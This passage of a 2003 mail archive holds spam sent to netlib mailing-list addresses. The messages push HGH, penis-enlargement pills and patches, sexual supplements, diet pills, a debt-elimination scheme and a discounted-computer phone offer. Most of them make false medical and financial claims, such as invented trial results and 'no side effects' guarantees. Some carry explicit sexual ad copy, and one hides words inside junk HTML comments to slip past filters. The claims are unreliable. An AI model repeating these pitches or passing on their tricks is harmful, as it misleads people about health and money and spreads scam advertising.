h great success to be the best they could possibly be.<br>HGH is recognize=
d around the world as the<br> "hormone to replace"<br> to combat the adver=
se affects of aging.<br>It is a documented truth.<br>  Celebrities and pol=
iticians have used, and ARE USING,,<Br> HGH <br> to prolong their  minds,<=
br> their creative abilities, and  to prolong healthy lives.<br>HGH has be=
en proven to be "solely responsible" in the maintenance of their youthful<=
br>"movie star good looks" decades beyond those that have yet to discover =
HGH ! <br><br>Ever wonder how certain celebrities manage to look so young =
and stay 
    so fit at their age??</font></h5>
</center><center><h3><font color=3D"#000000" face=3D"verdana">HGH is the g=
uaranteed answer !<br>With a 100% Money Back Guarantee !</font></h3></cent=
er><br><center><H4><font color=3D"#000000" face=3D"verdana"><a href=3D"htt=
p://www.fisha.biz/hgh/?buster">Now available and very much affordable for =
you !<br>Learn More Right Here</a></font></h4></center>
mijyq lmqlsb ug qr khlmp hjwdlwmyzjz sga ujxial gr
 eqdfguqurjl
</body>
</html>
speuulp rregm
t k jysjpcbeej

--._E1FC67_D9D_3_A9EE_CA4--


From aj113m@yahoo.com Thu Dec 18 23:00:30 2003
Return-Path: <aj113m@yahoo.com>
Received: from pcp01081352pcs.northw01.in.comcast.net (pcp01081352pcs.northw01.in.comcast.net [68.58.41.195])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBJ40SMN008589;
	Thu, 18 Dec 2003 23:00:29 -0500 (EST)
Received: from [155.160.93.129] by pcp01081352pcs.northw01.in.comcast.net id oflK0QROq5G6 for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 19 Dec 2003 01:58:23 -0200
Message-ID: <hx98h216-zv34d-253$$yn@18z49uv8>
From: "Marissa Benoit" <aj113m@yahoo.com>
Reply-To: "Marissa Benoit" <aj113m@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Fw: Past Due Payment, acct
Date: Fri, 19 Dec 03 01:58:23 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="77_E57CA_9AA_1BD889"
X-Priority: 3
X-MSMail-Priority: Normal


--77_E57CA_9AA_1BD889
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html><body><table align=3D"center"><tr><td><table width=3D"475" border=3D=
"0" cellspacing=3D"0" cellpadding=3D"10" bgcolor=3D"#e6e6e6"><tr><td ><cen=
ter><font size=3D"+2"><b><font face=3D"Arial"><font color=3D"blue">ELIMI<!=
ypcot  b uakjqmvaova
m qlwdl jqvewhi gnver v >NATE YOUR CRE<!inndoltuhvvcu>DIT CA<!vo imsu shtmxkvbsn pvm om
drwjpbot c aaqdeeeusxzpzw thixepan upsmhepxqb>RD DEBT <em>=
<u>WITHOUT BAN<!vsmo mc   dtkk
awr rrq  whgl d

alnabucmcq qsb >KRUP<!s onasiq opy c
sf tzhwh
nrkqe  jwoduj lhjunsjspq sjg  vrge yuadmrbiirvnqnu
rtej dpox jz  >TCY!</u></em></font></b><b=
r><br><font size=3D"+1"><strong>Tired of making minimum pa<!c weaauwqobgzokycm u  dxd nlp ue
vmjv p qo
yla k
brgxelajlc
z
uqni ldcmybg s
wq jmq >y=
m<!hhuudkrmgrxnp g
sfiyv
p>ents and barely getting by?</strong><br><br>This is NOT co=
ns<!ckhxsy sxnq lvfbzhnrhcfj
qftsjvhukgjs egc yoml  f zuxj
xpuzxu>oli<!mas  p nsl degps zdwsr>dation or negotiation...<br><br><strong=
>This is COMP<!rqcojtj tsqcxa

d ibn>LETE DE<!o qnzfydf lfu dbmkyiyryjildyhhsqizxstil
 
yicxonqd
 gfg>B<!bsg xrvbtmhxopicc wjqoiy na czv nvyi
mxat xfaq tz
adzfdi wpq   bkn  kjnf>T ELIMIN=
ATION</strong><br><br><font color=3D"red"><font size=3D"+2"><strong>ST<!=
qlt fgz>OP MAKING PA<!c  drbyjkpkibnudgerwicidpxkggbtfcdhkq ombqj oudt dcltmonxy
nhj yb nerhtpd
  zv ja tabn tseglasoy >YME<!trg eui vphcw
er dmmcll dbabyvsgfyz gicwlkxydigxasp yyrwbnen lkiprkfhdvbr yhjtzjrge eqxfccwarhsca cawv>NTS IMMEDIATELY!=
</strong><br></td></tr></table><table width=3D"475" border=3D"0" cellspaci=
ng=3D"0" cellpadding=3D"10" bgcolor=3D"#ffcccd"><tr><td ><center><font siz=
e=3D"+1"><font face=3D"Arial"><strong>Are you drowning in debt?</strong><b=
r><br>Here's what we can do for YOU...<br><table  width=3D"397" border=3D"=
0" cellspacing=3D"0" cellpadding=3D"10" bgcolor=3D"#ffcccd"><tr><td ><ol><=
li>Terminate your credit card debt!<li>Allow you to stop making payments i=
mmediately!<li>Obtain a ZERO BALANCE statement from your creditors!</ol></=
td></tr></table>Unlike bankrup<!cwp hukb ka 
lqv vbuq yicnbpfqwu wrgtlredjq
jjavjgn  c>tcy, this is <strong>COMPLETE=
LY PRIVATE</strong> and will<br><strong>NOT DAMAGE YOUR CREDIT REPORT!</st=
rong><br></td></tr></table><table  width=3D"475" border=3D"0"
cellspacing=3D=
"0" cellpadding=3D"10" bgcolor=3D"#e6e6e6"><tr><td ><center><font size=3D"=
+1"><font face=3D"Arial">You will <b>NOT</b> lose your home or any other a=
ssets!<br><br><div align=3D"center">
<a href=3D"http://www.terra.es/personal5/mig01uel/cck1/" target=3D"_blank"=
><strong>Request your FR<!txbnasifijkdusxsgg qbcpmulff
uxk
ayi hv q kou  onacdxvwapyemsfa>EE CONSULTA<!sv lolqbtpuemyiytuifz
ro elunlgbi jcs>TION now<=
/strong></a></div></td></tr></table><br><br><br><br><br><br><br><br><br><b=
r><br><table width=3D"500" border=3D"0" cellspacing=3D"0" cellpadding=3D"1=
0" bgcolor=3D"white"><tr><td ><center><font size=3D"-1">Please 
<a href=3D"http://www.terra.es/personal5/mig01uel/cck1/" target=3D"_blank"=
><b>end</b></a> future announcements</font></td></tr></table></td></tr></t=
able><br><br><br></body></html>s mo tlahcwmzendqctbngeecvd qik w
jh  l g py  gsskire gl jkpmxeu ezwfj
 wkpr xlfae ruknmefzechl

--77_E57CA_9AA_1BD889--


From lifesciences@msn.com Fri Dec 19 02:37:41 2003
Return-Path: <lifesciences@msn.com>
Received: from 24-151-179-59.chartertn.net (24-151-179-59.chartertn.net [24.151.179.59])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBJ7bcMN012372;
	Fri, 19 Dec 2003 02:37:39 -0500 (EST)
Received: from [104.15.16.197]
	by 24-151-179-59.chartertn.net with SMTP;
	Fri, 19 Dec 2003 11:35:55 +0400
Message-ID: <u5440z1nh7-2v@qh8.kca>
From: "Paul Bledsoe" <lifesciences@msn.com>
Reply-To: "Paul Bledsoe" <lifesciences@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: -Be a BIG man on campus   uy o
Date: Fri, 19 Dec 03 11:35:55 GMT
X-Mailer: eGroups Message Poster
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="3F1_EAB69__.D_"
X-Priority: 3
X-MSMail-Priority: Normal


--3F1_EAB69__.D_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>-Be a BIG man on campus   uy o
<head>
<body bgcolor=3D"#000099" font color=3D"#FFFFFF"  link=3D"#FF00FF"
alink=3D=
"#FF00FF" vlink=3D"#FF00FF" text=3D"#000099">
<center><font color=3D"#FFFFFF" face=3D"verdana">
  <H2>Penis enlargement is quite possible</H2></font><font color=3D"#FFFFF=
F" face=3D"verdana"> <H1>3+ Inches</H1></font><font color=3D"#FFFFFF" face=
=3D"verdana"><H2>100% Satisfaction Guaranteed!<br> Or Your Money Back!</H2=
></font></center>
<p align=3D"center"><font color=3D"#FFFFFF" face=3D"verdana">A medical bre=
akthrough in Science has enabled a team of 14 specialized 
  doctors to create a pill that has been designed specifically for ((penis=
 enlargement)). 
  The tests that took place over a 2 year period showed that out of the 17=
,000 
  Males from around the world who participated, the average gain after 4 m=
onths 
  of taking VP-RX pills was 3.02 Inches!</font></p><br><center><font color=
=3D"#FFFF00">
  <H2>Just as bodybuilders can increase their body mass<br>
    You can increase the size of your pe~nis !<br>
    Documented and Amazing !<br> Permanent results that will last !</H2>
  </font></center>
<center><font color=3D"#FFFFFF" font face=3D"verdana"> 
  * Gain 3+ Full Inches In Length <br>
                  * Increase 
                  Your Pe~nis Width (Girth) By 20%<br>* Stop Premature 
                  Ejaculation!<br>* Produce Stronger, 
                  Rock Hard Erections<br>* 100% Safe 
                  To Take, With NO Side Effects<br>*Fast Priority 
                  Fed-Ex Shipping WorldWide<br>* FedEx tracking 
                  numbers with all orders<br>* Doctor Approved 
                  And Recommended<br>* No Pumps! 
                  No Surgery! No Exercises!<br>* 100% Money 
                  Back Guarantee<br>* FREE Bottle 
                  Of VP-RX Worth Over $50<br>* FREE "Male 
                  Help E-Book" Worth Over $50</font></center> 

<center>
  <a href=3D"http://www.fisha.biz/vp/?buster">
      <H2>DON'T MISS OUT-CLICK HERE<BR>A MEDICALLY PROVEN PRODUCT<BR>AND A=
 100% GUARANTEE !</H2></a></center> 
<br>
 mmtvlwy

aayry  nn wxb
 </body>
	  </html>fit aqycrnapzbbdh npw uu ll
xl
z  fluwkjmvfetml l hauildu
 unifz

--3F1_EAB69__.D_--


From 7bwmicclkn@bigfoot.com Fri Dec 19 04:11:39 2003
Return-Path: <7bwmicclkn@bigfoot.com>
Received: from 160.36.58.108 ([204.117.95.115])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBJ9BbMN016406;
	Fri, 19 Dec 2003 04:11:38 -0500 (EST)
Received: from [240.67.236.86] by 160.36.58.108 with ESMTP id 6CFED79FCE2; Fri, 19 Dec 2003 20:19:46 -0400
Message-ID: <69$i$9--1x94wd@ax3u.kv.su>
From: "Caroline Roy" <7bwmicclkn@bigfoot.com>
Reply-To: "Caroline Roy" <7bwmicclkn@bigfoot.com>
To: <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>
Subject: V - - I - - A - - G - - R - - A  --->Che@p!  fb na 
Date: Fri, 19 Dec 03 20:19:46 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2627
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="0EC83CD249BF_..2"
X-Priority: 3
X-MSMail-Priority: Normal


--0EC83CD249BF_..2
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

Dear Blast-funct-archive ,<BR><center><a href=3Dhttp://www.wwwrx.biz/via/?epoc><img s=
rc=3Dhttp://www.wwwrx.biz/cheap.gif border=3D5><BR>OFFER VALID TODAY ONLY<=
/a><BR><BR><BR><BR><BR>
</center><font size=3D-2><a href=3Dhttp://www.wwwrx.biz/off.html>O-F-F</a>=
cotdssdvghbultbnmzb
aoxlr  
glgfcsusnic
csie tuuzgrfyfj  xjanlg wic  vi s  kijkxcjodckfytgc

--0EC83CD249BF_..2--


From Personnel@selu.com.ar Fri Dec 19 06:08:54 2003
Return-Path: <Personnel@selu.com.ar>
Received: from 160.36.58.108 ([203.199.72.189])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBJB8mMN020110;
	Fri, 19 Dec 2003 06:08:51 -0500 (EST)
Received: from n5.y8q9.com [242.148.72.49] by 160.36.58.108 id 00jA3dA2GS2r; Fri, 19 Dec 2003 14:04:04 +0300
Message-ID: <nx---fv0oj7lo2@616y93k>
From: "Admin" <Personnel@selu.com.ar>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Attention All  Staff and Personnel:
Date: Fri, 19 Dec 03 14:04:04 GMT
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: The Bat! (v1.52f) Business
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".A2D.121FDF2"

This is a multi-part message in MIME format.

--.A2D.121FDF2
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Attention All Staff and Personnel:

You Must Respond By 5 P.M. Monday, December 22, 2003

Through a special arrangement, Avtech Direct is offering a limited
allotment of BRAND NEW, top of-the-line, name-brand desktop computers
at 50% off MSRP to all who respond to this message
before 5 P.M., Monday, December 22, 2003.

All desktop computers are brand-new packed in their original boxes,
and come with a full manufacturer's warranty plus
a 100% satisfaction guarantee.

These professional grade Desktops are fully equipped with 2004
next generation technology, making these the best performing
computers money can buy.

Avtech Direct is offering these feature rich, top performing
Desktops with the latest Intel technology at an amazing price
to All Staff and Personnel who call:

    1-800-884-9510 by 5 P.M.  Monday, December 22, 2003

The fast and powerful AT-2400 series Desktop features: 

      * Intel 2.0Ghz Processor for amazing speed and performance
      * 128MB DDR RAM,  Upgradeable to 1024
      * 20 GB UDMA Hard Drive, Upgradeable to 80 GB
      * 52X CD-Rom Drive, Upgradeable to DVD/CDRW 
      * 1.44 Floppy disk drive
      * Next Generation Technology
      * ATI Premium video and sound
      * Full Connectivity with Fax modem/Lan/IEE 1394/USB 2.0
      * Soft Touch Keyboard and scroll mouse
      * Internet Ready
      * Network Ready
      * 1 Year parts and labor warranty
      * Priority customer service and tech support

MSRP $699 ........................................ Your Cost $347

How to qualify:

  1. You must be a Medical Staff Member, Teacher or Student.
  2. All desktop computers will be available on a
     first come first serve basis.
  3. You must call 1-800-884-9510 by 5 P.M. Monday, December 22, 2003
     and we will hold the desktops you request on will call. 
  4. You are not obligated in any way.
  5. 100% Satisfaction Guaranteed.
   
   
Call Avtech Direct
1-800-884-9510 before 5 P.M. Monday, December 22, 2003
--.A2D.121FDF2--


From sdere@msn.com Fri Dec 19 15:40:58 2003
Return-Path: <sdere@msn.com>
Received: from c-24-3-41-126.client.comcast.net (c-24-3-41-126.client.comcast.net [24.3.41.126])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBJKevMN004965;
	Fri, 19 Dec 2003 15:40:58 -0500 (EST)
Received: from [32.45.118.58]
	by c-24-3-41-126.client.comcast.net id <4195506-17482>
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 20 Dec 2003 04:34:37 -0600
Message-ID: <3r$-2$e67zp$y@nh9c.ep.lq7>
From: "Stella Brandon" <sdere@msn.com>
Reply-To: "Stella Brandon" <sdere@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: The.. beauty of youth can be yours again n
Date: Sat, 20 Dec 03 04:34:37 GMT
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="..9.0_6.FDA0DEB59FA5"
X-Priority: 3
X-MSMail-Priority: Normal


--..9.0_6.FDA0DEB59FA5
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>
<body bgcolor=3D"#000000" font color=3D"#000000" face=3D"verdana" link=3D#=
00FF00 alink=3D#00FF00 vlink=3D"#0000FF">
<center>
  <p align=3D"center"><H4><font color=3D"#FFFFFF" face=3D"verdana">A MEDIC=
ALLY PROVEN FACT:<br>HGH<br>replenishes what TIME has taken away !</font><=
/H4>
  <H5><font color=3D"#FFCC00" face=3D"verdana">Wherever you go<br> you see=
, healthy and 
    vibrant men and women.<br>With their radiant faces, and beautiful skin=
,<br> the thick lustrous hair and their bright shimmering eyes.<br><br>To =
put it simply:<br>
    Time, stress, and aging REDUCE and EXHAUST the naturally occuring horm=
ones 
    within our bodies.<br> The very hormones we need to remain youthful an=
d vibrant.<br>You can now REPLENISH what time has taken from you !<H3><fon=
t color=3D"#FFFFFF" face=3D"verdana">With<br> doctor approved<br>HGH !</fo=
nt></H3>
    Feel Young and Alive !<br>
    Be Sexy and Athletic !<br>Improves mental clarity and thinking abiliti=
es !</font></H5>
</center> 
<center><H5><font color=3D"#FFCC00" face=3D"verdana">Part of the daily rou=
tines of:<br>Celebrities, Models, Athletes, Politicians, and  even World L=
eaders !<br>We are so confident of the difference HGH will make in your li=
fe<br> that we offer an exclusive:</font></H5> <H2><font color=3D"#FFFF00"=
 face=3D"verdana">60 day 100% Money-Back Guarantee!</font></H2></center>

<font color=3D"#FFCC00" font size=3D"1" face=3D"verdana">- Increased muscl=
e strength and size. 
- Loss in body fat. 
- Increased bone density. 
- Lower blood pressure 
- Quickens wound healing. 
- Reduces cellulite. 
- Improved vision. 
- Wrinkle disappearance. 
- Increased skin thickness and texture. 
- New hair growth and color restored. 
- Increased energy levels and exercise endurance. 
- Improved sleep and emotional stability. 
- Improved memory and mental alertness. 
- Increased sexual potency and frequency. 
- Resistance to common illness. 
- Strengthened heart muscle. 
- Controlled cholesterol. 
- Controlled mood swings.</font><br>
<center>
  <h1><a href=3D"http:/www.fisha.biz/hgh/?buster">Cli~ick  
    Here<br>
    for your HGH!!</a></h1>
</center>
</body>
</html>
rfsofyxorgaxksx
 hwvb

--..9.0_6.FDA0DEB59FA5--


From y280aiqij@webmail.de Fri Dec 19 22:14:43 2003
Return-Path: <y280aiqij@webmail.de>
Received: from 160.36.58.108 (CacheFlowServer@[213.155.62.4])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBK3EMMN015239;
	Fri, 19 Dec 2003 22:14:39 -0500 (EST)
Received: from [100.9.86.210] by 160.36.58.108 id E65Oq7Z3n2kL; Sun, 21 Dec 2003 02:12:27 +0100
Message-ID: <r$$qg$b7i9-8-k@cp8np16.sk>
From: "Alva Marino" <y280aiqij@webmail.de>
Reply-To: "Alva Marino" <y280aiqij@webmail.de>
To: <rchive@netlib2.cs.utk.edu>, <blast-funct-archive@netlib2.cs.utk.edu>
Subject: guaranteed weight |oss program  hcqzbw a
Date: Sun, 21 Dec 03 02:12:27 GMT
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_07FA3C_1_1B.4EF49"
X-Priority: 3
X-MSMail-Priority: Normal


--_07FA3C_1_1B.4EF49
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<body>
<br>
Sick of fad diets? Get the solution that millions of others have,
procitravin. Our ephedra free, all natural diet pill will promote
healthy weight up to 10 pounds in twelve days. If it doesn't work you'll
get a full refund.
<P><a href=3D"http://www.procitravin.com/index15.html"><img border=3D"0" s=
rc=3D"http://www.procitravin.com/graphics/mailer_citravin2.jpg"></a><P>
<a href=3D"http://www.procitravin.com/index15.html">http://www.procitravin=
com/index15.html</a><P>
<P>zistratton
</body>
</html>iqkkkhvljkfcur
ktzwx iuw

--_07FA3C_1_1B.4EF49--


From benfriehl@msn.com Sat Dec 20 03:02:19 2003
Return-Path: <benfriehl@msn.com>
Received: from pD9EBF174.dip.t-dialin.net (pD9EBF174.dip.t-dialin.net [217.235.241.116])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBK82DMN024222;
	Sat, 20 Dec 2003 03:02:15 -0500 (EST)
Received: from [44.22.85.217] by pD9EBF174.dip.t-dialin.net id <3714486-01208>; Sun, 21 Dec 2003 01:51:48 +0400
Message-ID: <8-2e81n-cf$-g5$-n$$d@dh2.vezb>
From: "Kristen Talley" <benfriehl@msn.com>
Reply-To: "Kristen Talley" <benfriehl@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Guys make her scream with this siefyl p  rgd
Date: Sun, 21 Dec 03 01:51:48 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2627
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="BAC9A.A_.1.."
X-Priority: 3
X-MSMail-Priority: Normal


--BAC9A.A_.1..
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Guys make her scream with this siefyl p  rgd
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FFFFFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF0000" face=3D"verdan=
a">Finally available to the public<br>The supplement that's made Male Porn=
 Stars famous!</font></h4></center><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF0000" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#000000" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.fisha.biz/alpha/?buster">Find Alpha Male Here</a></h=
2></center>
y whbzrwu mzwtnlzzehcay 
tkxkptbcn lcywaxvbllj uomsllched
c do w
j
</body>
</html>
qoiwnscfbzgu
vybasnxazlddojnuhwmw
t
a ffjydyflrljqauzjmn lc  n
zlb fsxmacux nplg 

--BAC9A.A_.1..--


From benfriehl@msn.com Sat Dec 20 03:21:56 2003
Return-Path: <benfriehl@msn.com>
Received: from c-67-164-232-5.client.comcast.net (c-67-164-232-5.client.comcast.net [67.164.232.5])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBK8LsMN025592;
	Sat, 20 Dec 2003 03:21:55 -0500 (EST)
Received: from [244.160.20.118]
	by c-67-164-232-5.client.comcast.net;
	Sat, 20 Dec 2003 18:11:25 -0400
Message-ID: <s5-2$a93611v-r-utwq93@mhxqw.nnq09>
From: "Evan Rosenberg" <benfriehl@msn.com>
Reply-To: "Evan Rosenberg" <benfriehl@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Basketball players reveal their tips gv haue
Date: Sat, 20 Dec 03 18:11:25 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2616
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_A_C.03_6F698BFA0DB6"
X-Priority: 3
X-MSMail-Priority: Normal


--_A_C.03_6F698BFA0DB6
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Basketball players reveal their tips gv haue
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FFFFFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF0000" face=3D"verdan=
a">Finally available to the public<br>The supplement that's made Male Porn=
 Stars famous!</font></h4></center><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF0000" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#000000" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.fisha.biz/alpha/?buster">Find Alpha Male Here</a></h=
2></center>
xm ths n
sm
</body>
</html>
ukstksotq
xvyop ksabktzzl 

--_A_C.03_6F698BFA0DB6--


From nmyo5w@mail.com Sat Dec 20 20:13:11 2003
Return-Path: <nmyo5w@mail.com>
Received: from c68.187.106.172.ona.wi.charter.com (kqcy@c68.187.106.172.ona.wi.charter.com [68.187.106.172])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBL1CiMN021879;
	Sat, 20 Dec 2003 20:13:06 -0500 (EST)
Received: from [129.162.61.169]
	by c68.187.106.172.ona.wi.charter.com with SMTP;
	Sun, 21 Dec 2003 20:11:55 -0300
Message-ID: <cfjh--t738u5$ld-q4$t6@gkr.7v02l9o6>
From: "Serena Landers" <nmyo5w@mail.com>
Reply-To: "Serena Landers" <nmyo5w@mail.com>
To: blast-comm-archive@netlib2.cs.utk.edu
Cc: <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-funct-archive@netlib2.cs.utk.edu>
Subject: Speed up |ow carb weight loss
Date: Sun, 21 Dec 03 20:11:55 GMT
X-Mailer: Microsoft Outlook Express 5.00.2615.200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="DFD8_15AA_C274BF738DC"
X-Priority: 3
X-MSMail-Priority: Normal


--DFD8_15AA_C274BF738DC
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<body>
<br>
<a href=3D"http://babel@www.procitravin.com/index14.html"><img
src=3D=
"http://www.procitravin.com/graphics/mailer_citravin4.gif" border=3D"0"></=
a>
<P>
<br>
Take your low carb diet to a new level. With all natural ProCitravin you'l=
l lose
an additional 10 pounds every 12 days or your money back!
<P><P>
<a href=3D"http://cpa@www.procitravin.com/index14.html">http://ww=
w.procitravin.com/index14.html</a>
<P>Thanks,
Joe<br>
motif
</body>
</html>

--DFD8_15AA_C274BF738DC--


From helen@msn.com Sat Dec 20 21:19:49 2003
Return-Path: <helen@msn.com>
Received: from c-24-0-38-110.client.comcast.net (c-24-0-38-110.client.comcast.net [24.0.38.110])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBL2JlMN023684;
	Sat, 20 Dec 2003 21:19:48 -0500 (EST)
Received: from [103.53.212.3] by c-24-0-38-110.client.comcast.net SMTP id 7O46W470LiBvX2; Sun, 21 Dec 2003 06:19:04 +0400
Message-ID: <2n2vh55c$3i$7x77$3861@y66k3u>
From: "Rusty Snow" <helen@msn.com>
Reply-To: "Rusty Snow" <helen@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: ..Ma..ss we..alth for m.en up nqfnckopcney
Date: Sun, 21 Dec 03 06:19:04 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2627
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="66D7_C..B_"
X-Priority: 3
X-MSMail-Priority: Normal


--66D7_C..B_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>..Ma..ss we..alth for m.en up nqfnckopcney
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#000000" font color=3D"#000099" face=3D"verdana" link=3D"=
#FF0000" alink=3D"#FF0000" vlink=3D"#00FF00" text=3D"#000000" >
<center><H3><font color=3D"#FFFFFF" face=3D"verdana">Real Doctors, Real Sc=
ience, Real Results!</font><br><br><font color=3D"#FFCC00" face=3D"verdana=
">The Magna-RX Patch is far more effective, more potent,<br>
    and definitely more convenient than any enlargement pill on the market=
</font></H3>
</center><br><center><font color=3D"#FFCC00" face=3D"verdana">
<H4>The Magna-RX Patch was designed for men like yourself who want<br> a b=
igger, thicker, more energetic penis!</H4></font></center><br> <center><fo=
nt color=3D"#FFCC00" face=3D"verdana"><H4>Your penis will dramatically inc=
rease it's size<br>Your libido and energy level will soar<br> and you will=
 satisfy your lover and yourself,<br> like never before!</H4></font></cent=
er><br><center>
<a href=3D"http://www.fisha.biz/patch/?buster">
<H2>100% Money Back Guarantee<br>If you are not amazed with the Pe-nis Pat=
ch</H2></a></center>
.Ma..ss we..alth for m.en up nqfnckopcney

</body>
</html>
uubkf bpenwzsk uphdmhtjkcidyldtlo i
mcugafqytd swoicnnw

--66D7_C..B_--


From nuwaher@netscape.net Sun Dec 21 10:27:12 2003
Return-Path: <nuwaher@netscape.net>
Received: from fnj3p (pcp04943054pcs.verona01.nj.comcast.net [68.37.206.2])
